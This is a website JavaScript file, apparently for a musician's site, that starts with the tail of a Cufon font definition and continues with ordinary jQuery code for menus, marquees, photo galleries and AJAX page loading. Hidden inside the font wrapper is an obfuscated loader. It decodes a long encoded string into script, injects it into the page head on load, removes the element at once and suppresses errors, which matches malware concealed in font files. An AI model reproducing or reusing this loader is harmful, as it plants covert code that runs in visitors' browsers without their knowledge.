9},{"d":"120,-74v1,-64,17,-116,25,-174r36,0r-43,248r-36,0r-30,-174v-2,64,-16,116,-25,174r-37,0r44,-248r36,0","w":179},{"d":"138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52xm121,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm65,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":149},{"d":"162,-63r18,-60r44,-125r38,0r-91,248r-38,0r-2,-159v-17,56,-38,107,-58,159r-37,0r-4,-248r42,0r-6,185v18,-66,43,-124,66,-185r29,0","w":239,"k":{"y":7,"u":7,"s":7,"r":7,"o":14,"e":14,"a":14,"A":7,";":7,":":7,".":22,",":22,"'":-7}},{"d":"7,-5v-21,-27,24,-65,47,-39v19,27,-25,65,-47,39","w":87,"k":{"'":58,"\"":58}},{"d":"95,-248r-19,101v21,-36,44,-68,68,-101r43,0r-70,98r21,118r21,0r-6,32r-51,0r-18,-107r-19,28r-14,79r-41,0r44,-248r41,0","w":157,"k":{"O":4,"G":4,"C":4,";":-14,":":-14,".":-18,",":-18,"'":-2,"\"":5}},{"d":"87,-248r-25,138v15,-26,39,-46,57,-70r42,0r-61,69r16,79r19,0r-6,32r-45,0r-15,-76r-16,19r-10,57r-40,0r44,-248r40,0","w":140,"k":{"z":-7,".":-14}},{"d":"42,1v-22,-3,-33,-21,-31,-48v4,-67,14,-153,95,-132v8,2,15,4,21,7r-7,38v-10,-6,-18,-11,-31,-11v-34,0,-32,53,-36,85v-6,38,35,24,52,12r-7,42v-11,4,-22,7,-36,7r-6,14v35,15,10,63,-22,58v-12,-1,-21,-6,-29,-11r4,-19v9,8,40,19,43,0v2,-11,-10,-13,-23,-12","w":118},{"d":"35,-115r5,-26r93,0r-4,26r-94,0xm25,-57r5,-27r93,0r-5,27r-93,0","w":154},{"d":"130,-230v-26,47,-104,17,-72,-33v10,-27,70,-37,77,0v3,12,0,25,-5,33xm114,-247v5,-18,-20,-24,-32,-14v-11,9,-11,35,8,34v12,0,21,-10,24,-20xm99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139"},{"d":"143,-232r-93,193r64,0r-7,39r-116,0r3,-17r92,-193r-56,0r7,-38r108,0","w":129,"k":{"O":7,"G":7,"C":7}},{"d":"53,0r-43,0r44,-248r95,0r-7,38r-52,0r-10,60r48,0r-7,39r-49,0","w":131,"k":{"A":2,".":11,",":11,"'":-7,"\"":-7}},{"d":"118,-39r-7,39r-101,0r44,-248r97,0r-7,38r-54,0r-10,60r50,0r-7,39r-51,0r-12,72r58,0","w":142},{"d":"99,-223r-18,18r-31,0r46,-48r15,0r30,48r-30,0xm95,-117v2,-20,9,-36,-9,-36v-20,0,-19,15,-25,36r34,0xm109,-7v-34,16,-102,19,-98,-35v4,-62,10,-142,80,-142v56,0,47,54,36,98r-72,0v-6,33,-9,61,28,54v10,-2,21,-6,33,-12","w":142},{"d":"35,-186r87,79r-3,16r-115,79r7,-40r72,-49r-55,-49","w":133},{"d":"147,-249v-1,34,-40,52,-62,25v-10,-7,-15,0,-18,11r-21,0v3,-35,40,-53,62,-25v10,7,16,1,18,-11r21,0xm138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52","w":149}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+267-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("FI6`xNhgyd~]F3Qz4NWKHIH~&Uh`6N~]&U#KydnZ6.pV18gL&;0roI}bC&EY4C:r1N.Y4C:r1C.Y4C:r6NWY4C:r67W44.S`o7eQ6QS`o7e[hqhY4C:r6=4Y4C:r6d.Z0QS`o7e[oqbx&;0roIWLxWS`o7eLoWS`o7eL1dhY4C:r67[Y4C:r6CeY4C:r67eYA`bG&;0roI0UFWS`o7e=1.S`o7eQc3hg_QS`o7eNc.S`o7e=6QS`o7ew6NnY4C:r6N#Y4C:r6C#Y4C:r1U#p_WS`o7e=oQS`o7ew6?nY4C:r6I#Y4C:r1=[Y4C:r6IhY4C:r6N6Y4C:r1d}K&;0roI#w&;0roIWNnWeY4C:r18hY4C:r6ChY4C:r1C#Y4C:r1UnE&;0roI#LAWS`o7eLhWS`o7e[oWS`o7e=1`S`o7eNo`S`o7eQ1QS`o7eQo.S`o7eLh`S`o7ewoNHl&;0roI}S&;0roI0b&;0roIHK&3#Y4C:r18WY4C:r1=WY4C:r18nY4C:r67.Y4C:r1N6rhWS`o7e[cWS`o7ew1.S`o7eNcWQ~oCoZhweY4C:r671^?WS`o7ew6IQY4C:r6=eY4C:r1CnY4C:r18QY4C:r6Noq..S`o7e[6ClpMK6Y4C:r6N.Y4C:r1do2xq#Y4C:r1Nof&;0roIH`H.S`o7e=6d>b&;0roIJbc`S`o7eQ6WS`o7e[hQS`o7e=c}4Y4C:r1=wQ&;0roIJq6Q[F0C.Y4C:r67nY4C:r6NnlJUWqxQo*&;0roI1SoWnY4C:r6CnY4C:r1=6b&;0roIJ8CWS`o7e=hQSYJ&WY4C:r18.QA.S`o7eLoU[Y4C:r18eU&;0roI1K.w##&;0roIoqC`S`o7eQ1`S`o7eNh}bY4C:r6=6&AwE^&;0roI0qM.S`o7eQh.*In.S`o7eQ1CbY4C:r6=:e37}WI;H#FAohcMJn?C0.d&16yxY4_Gl[L=wQNZ>*2^VE])rSK8g`Uq!bfzp~({0LAZhrxIQgF3HLF?S*MC:VY7`LAZ:Vx7`rANSQxN4gy3SZMdH]6LbZx;Qry;o~_qgzyd1>1Lb)y8g)&Ll{cZ4q4`r]FCp>M8*E6I`[&3bL6?wwAUw]4I.843[VxUh[4IQ)xLb>xqhgxNWE6?w*6N~KF7E*MIrzFKE*Fd4x1`E*&.g~YWE*&&g*F3wl")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":151,"face":{"font-family":"Solex","font-weight":700,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 6 2 0 0 9 0 4","ascent":"281","descent":"-79","x-height":"4","bbox":"-40 -359.145 262 73.3634","underline-thickness":"10.8","underline-position":"-26.28","slope":"-12","unicode-range":"U+0020-U+00FF"}}));

ByRei_jScroller2.config.refreshtime = 45;

var marqueeblok1;
var marqueeblok2;
var marqueeblok3;

$(document).ready(function() {
	marqueeblok1 = $("#marqueeblok1");
	marqueeblok2 = $("#marqueeblok2");
	marqueeblok3 = $("#marqueeblok3");
	marqueeblok2.css('left',marqueeblok1.width()+"px");
	marqueeblok3.css('left',marqueeblok1.width()*2+"px");
	m_animatie(marqueeblok1);
	m_animatie(marqueeblok2);
	m_animatie(marqueeblok3);
});

function m_animatie(blok) {
	var starty = blok.css('left');
	blok.animate({left:'-='+blok.width()},45000,'linear',function() {
		blok.css('left',starty);
		m_animatie(blok);
	});
}
var dropdownopen = false;

$('.dropdown').live('mouseenter',function() {
	$(this).removeClass('dropdown');
	$(this).addClass('dropdownover');
});

$('.dropdownover').live('click',function() {
	if (dropdownopen == false) {
		$(this).find('.dropdownpaneel').slideDown('fast');
		dropdownopen = true;
	}
});

$('.dropdownover').live('mouseleave',function() {
	$(this).removeClass('dropdownover');
	$(this).addClass('dropdown');
	$(this).find('.dropdownpaneel').slideUp('fast');
	dropdownopen = false;
});

$('.dropdownitem').live('mouseenter',function() {
	$(this).addClass('over');
});

$('.dropdownitem').live('mouseleave',function() {
	$(this).removeClass('over');
});

$('.dropdownitem').live('click',function() {
	$('#projectfilter_gekozen').text($(this).text());
	inhoudladen('inhoud/projects.php','ajax=1&filter='+$(this).attr('id').split('_')[1],'inhoud');
	$('.dropdownpaneel').slideUp('fast');
});
function fotocentreren() {
	var h_marge = ($('#grotefoto .foto').width()-$('#grotefoto .foto img').width())/2;
	var v_marge = ($('#grotefoto .foto').height()-$('#grotefoto .foto img').height())/2;
	$('#fotokader img').css('margin',v_marge+'px '+h_marge+'px');
	$('#fotokader img').fadeIn('slow');
}

$('#grotefoto').find('.pijllinks').live('click',function () {
	if ($('.gekozen').prev().length > 0) {
		var vorige = $('.gekozen').prev();
		var fotoid = vorige.attr('id').split('_')[1];
		$('.gekozen').removeClass('gekozen');
		vorige.addClass('gekozen');
		inhoudladen('inhoud/foto.php','id='+fotoid+'&ajax=1','fotokader');
	}
});
$('#grotefoto').find('.pijllinks').live('mouseenter',function() {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlgroot_links_over.gif');
});
$('#grotefoto').find('.pijllinks').live('mouseleave',function() {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlgroot_links.gif');
});


$('#grotefoto').find('.pijlrechts').live('click',function () {
	if ($('.gekozen').next().length > 0) {
		var volgende = $('.gekozen').next();
		var fotoid = volgende.attr('id').split('_')[1];
		$('.gekozen').removeClass('gekozen');
		volgende.addClass('gekozen');
		inhoudladen('inhoud/foto.php','id='+fotoid+'&ajax=1','fotokader');
	}
});
$('#grotefoto').find('.pijlrechts').live('mouseenter',function() {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlgroot_rechts_over.gif');
});
$('#grotefoto').find('.pijlrechts').live('mouseleave',function() {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlgroot_rechts.gif');
});


$('#thumbnail_balk > .pijllinks').live('click',function () {
	schuiver = $('#thumbnail_balk').find('.thumbnailschuiver');
	if(schuiver.position().left < 0) schuiver.animate({left: '+=819'},"slow","swing");
});

$('#thumbnail_balk > .pijllinks').live('mouseenter',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_links_over.gif');
});
$('#thumbnail_balk > .pijllinks').live('mouseleave',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_links.gif');
});


$('#thumbnail_balk > .pijlrechts').live('click',function () {
	schuiver = $('#thumbnail_balk').find('.thumbnailschuiver');
	if(schuiver.position().left-819 > 0-schuiver.find('.thumbnail').last().position().left) schuiver.animate({left: '-=819'},"slow","swing");
});

$('#thumbnail_balk > .pijlrechts').live('mouseenter',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_rechts_over.gif');
});
$('#thumbnail_balk > .pijlrechts').live('mouseleave',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_rechts.gif');
});


$('.thumbnail').find('div').live('mouseup',function() {
	$('.gekozen').removeClass('gekozen');
	$(this).parent().addClass('gekozen');
});

$('.thumbnail').live('mouseenter',function() {
	$(this).addClass('over');
});
$('.thumbnail').live('mouseleave',function() {
	$(this).removeClass('over');
});

function updatelocatie() {
	var titel = $('#hier').text().split(' ');
	var documenttitel = 'Jozef Dumoulin › ';
	for (var i=0; i < titel.length; i++) {
		documenttitel += titel[i].substr(0, 1).toUpperCase() + titel[i].substr(1).toLowerCase() + ' ';
	};
	$.address.title(documenttitel);
}

function inhoudladen(pagina,parameters,printplaats) {
	//bezig();

	$('#'+printplaats).load(pagina,parameters,function() {
		var actievepagina = pagina.substring(pagina.lastIndexOf("/")+1,pagina.lastIndexOf("."));
		
		if (printplaats != 'inhoud') inhoudverbergen();
		if (!$(this).is(':visible')) $(this).show();
		
		$('html, body').animate({scrollTop:0}, 'fast', 'swing');
		//updatelocatie();
		//klaar();
	});
}

function bezig() {
	//$('#lader').fadeIn('slow');
	//$('#overlay').show();
}
function klaar() {
	//$('#lader').fadeOut('fast');
	//$('#overlay').hide();
}

$(document).bind('ready ajaxComplete',function() {
	$('a').each(function() {
		var link = $(this);
		//checken op interne of externe link
		if(link.attr('href')) {
			if (link.attr('href').indexOf('bestanden/') == -1) {
				if ((link.attr('href').indexOf('http') > -1 && link.attr('href').indexOf('mdma.be') > -1)||(link.attr('href').indexOf('http') == -1 && link.attr('href').indexOf('mailto') == -1)) {
					link.address(function() {
						//vervang href, absoluut naar relatief (IE)
						lijm = '&';
						if (link.attr('href').indexOf('?') == -1) lijm = '?';

						if(link.attr('href').indexOf('mdma.be')>-1) return link.attr('href').replace('inhoud/','').replace('.php','/').split('mdma.be')[1]+lijm+"t="+link.attr('target');
						else return link.attr('href').replace('inhoud/','').replace('.php','/')+lijm+"t="+link.attr('target');
					});
				}
			}
		}
	});
});
$.address.change(function(event) {
	if(event.value == '/') {
		//inhoudladen('inhoud/laboratory.php','','inhoud');
	} else {
		var split = event.value.substring(1).split('?');
		var url = split[0];
		url = url.substring(0,url.length-1)+'.php';
		var parametersplit = split[1].split("t=");
		var target = parametersplit[1];
		var parameters = '';
		if (parametersplit[0].length > 0) parameters = parametersplit[0].substring(0,parametersplit[0].length-1);

		inhoudladen('inhoud/'+url,parameters+"&ajax=1",target);
	}
});

$.address.internalChange(function() {
	//alert('internalChange');
});
$.address.externalChange(function() {
	//alert('externalChange');
});

function email(adres) {
	emailadres = adres.replace(/#/,"@");
	window.open("mailto:"+emailadres, "_self");
}

$('#logo').live('mouseup',function() {
	$('.knop, .subknop').removeClass('actief');
	$('.submenu').hide();
});

$('.knop').live('mouseup',function() {
	$('.knop').each(function() {
		$(this).removeClass('actief');
		if ($(this).find('img').length > 0) $(this).find('img').attr('src',$(this).find('img').attr('src').replace('menuknopactief','menuknop'));
	});
	$('.subknop').each(function() {
		$(this).removeClass('actief');
		if ($(this).find('img').length > 0) $(this).find('img').attr('src',$(this).find('img').attr('src').replace('submenuknopactief','submenuknop'));
	});
	$('.subsubmenu').hide();
	$('.submenu').not($(this)).hide()

	if (!$(this).next().hasClass('submenu')) {
		$(this).addClass('actief');
		if ($(this).find('img').length > 0) $(this).find('img').attr('src',$(this).find('img').attr('src').replace('menuknop','menuknopactief'));
	}
	else {
		$(this).next().show();
		var subknop = $(this).next().find('.subknop').first();
		subknop.addClass('actief');
		if (subknop.find('img').length > 0) subknop.find('img').attr('src',subknop.find('img').attr('src').replace('submenuknop','submenuknopactief'));
		
		if ($('#projectsubmenu').length > 0) {
			if ($('#projectsubmenu').find('a').length > 0) {
				if ($('#projectsubmenu').find('a').first().length > 0) {
					if ($('#projectsubmenu').find('a').first().addCLass) $('#projectsubmenu').find('a').first().addCLass('gekozen');
				}
			}
		}
	}
});

$('.subknop').live('mouseup',function() {
	$('.subknop').each(function() {
		$(this).removeClass('actief');
		if ($(this).find('img').length > 0) $(this).find('img').attr('src',$(this).find('img').attr('src').replace('submenuknopactief','submenuknop'));
	});
	if ($(this).find('img').length > 0) $(this).find('img').attr('src',$(this).find('img').attr('src').replace('submenuknop','submenuknopactief'));
	$(this).addClass('actief');
	$('.subsubmenu').hide();
	if ($(this).next().hasClass('subsubmenu')) {
		var xpos = $(this).position();
		$(this).next().css('left',xpos.left+3);
		$(this).next().find('a').removeClass('gekozen');
		$(this).next().find('a').first().addClass('gekozen');
		$(this).next().show();
	}
});

$('#startlogo').live('mouseenter',function() {
	$('#startlogo img').fadeIn('fast');
});

$('#startlogo').live('mouseleave',function() {
	$('#startlogo img').fadeOut('fast');
});

$('.subsubmenu a').live('mouseup',function() {
	$('.subsubmenu a').removeClass('gekozen');
	$(this).addClass('gekozen');
});

$('#projectsubmenu a').live('mouseup',function() {
	$('#projectsubmenu a').removeClass('gekozen');
	$(this).addClass('gekozen');
});

$(document).bind('ready ajaxComplete',function() {
	if ($('#inhoud > .nieuwsitem > .foto').length > 0) {
		$('#nieuwsfotos').html($('#inhoud').html());
		$('#nieuwsfotos > .nieuwsitem > .tekst').remove();
		$('#nieuwsfotos').show();
	}
	else {
		$('#nieuwsfotos').html('');
		$('#nieuwsfotos').hide();
	}
});
$('.meer').live('click',function() {
	$(this).parent().find('.puntjes').hide();
	$(this).parent().find('.meerinfo').show();
	$(this).parent().find('.minder').show();
	$(this).hide();
});

$('.minder').live('click',function() {
	$(this).parent().find('.puntjes').show();
	$(this).parent().find('.meerinfo').hide();
	$(this).parent().find('.meer').show();
	$(this).hide();
	$('html, body').animate({scrollTop:0}, 'fast', 'swing');
});

$('#publicatie_balk').find('.pijllinks').live('click',function () {
	schuiver = $('#publicatie_balk').find('.publicatie_schuiver');
	if(schuiver.position().left < 0) schuiver.animate({left: '+=942'},"fast","swing");
});
$('#publicatie_balk').find('.pijllinks').live('mouseenter',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_links_over.gif');
});
$('#publicatie_balk').find('.pijllinks').live('mouseleave',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_links.gif');
});

$('#publicatie_balk').find('.pijlrechts').live('click',function () {
	schuiver = $('#publicatie_balk').find('.publicatie_schuiver');
	if(schuiver.position().left-942 > 0-schuiver.width()) schuiver.animate({left: '-=942'},"fast","swing");
});
$('#publicatie_balk').find('.pijlrechts').live('mouseenter',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_rechts_over.gif');
});
$('#publicatie_balk').find('.pijlrechts').live('mouseleave',function () {
	$(this).children('img').attr('src','afbeeldingen/gallerypijlklein_rechts.gif');
});
$('.project').live('mouseenter',function() {
	var img = $(this).find(".titel").find("img");
	img.attr("src",img.attr("src").replace("projectknop&","projectknopactief&"));
	$(this).addClass('projectover');
});

$('.projectover').live('mouseleave',function() {
	var img = $(this).find(".titel").find("img");
	img.attr("src",img.attr("src").replace("projectknopactief&","projectknop&"));
	$(this).removeClass('projectover');
});

function inhoudverbergen() {
	$('#navigatie').hide();
	$('#banner').hide();
	$('#inhoud').hide();
}

$('.projectover').live('click',function() {
	$(this).find('a').click();
	inhoudverbergen();
});

$('.project_close').live('mouseup', function() {
	$('#navigatie').show();
	$('#inhoud').show();

	$('#project_detail').hide();
	$('#project_detail').html('');

	$('#banner').show();

	$.address.autoUpdate(false);
	$.address.value('');
	document.location.hash = '/';
	$.address.autoUpdate(true);

});
$('.project_close').live('mouseenter',function() {
	$(this).find('img').attr('src','afbeeldingen/close_over.gif');
});
$('.project_close').live('mouseleave',function() {
	$(this).find('img').attr('src','afbeeldingen/close.gif');
});

$('.projectknop').live('mouseenter',function() {
	$(this).children('a').children('img').attr('src','afbeeldingen/projectinfo_over.gif');
});
$('.projectknop').live('mouseleave',function() {
	$(this).children('a').children('img').attr('src','afbeeldingen/projectinfo.gif');
});

$('.galleryknop').live('mouseenter',function() {
	$(this).children('a').children('img').attr('src','afbeeldingen/gallery_over.gif');
});
$('.galleryknop').live('mouseleave',function() {
	$(this).children('a').children('img').attr('src','afbeeldingen/gallery.gif');
});
$(window).scroll( function() {
/*	$('#navigatie').css('left',$(window).scrollLeft());	
	$('#banner').css('left',$(window).scrollLeft());	

	$('#navigatie').css('top',$(window).scrollTop());	
	$('#banner').css('top',$(window).scrollTop());	
*/
});

$(window).resize(function() {
/*	if ($(window).width() < 948) {
	  $('#navigatie').width($(window).width());
	}
	else {
	  $('#navigatie').width(948);
	}
  	$('#banner').width($(window).width()); */
});

$('.team_close').live('mouseup', function() {
	$('#navigatie').show();
	$('#inhoud').show();

	$('#team_detail').hide();
	$('#team_detail').html('');

	$('#banner').show();

	$.address.autoUpdate(false);
	$.address.value('');
	document.location.hash = '/';
	$.address.autoUpdate(true);

});


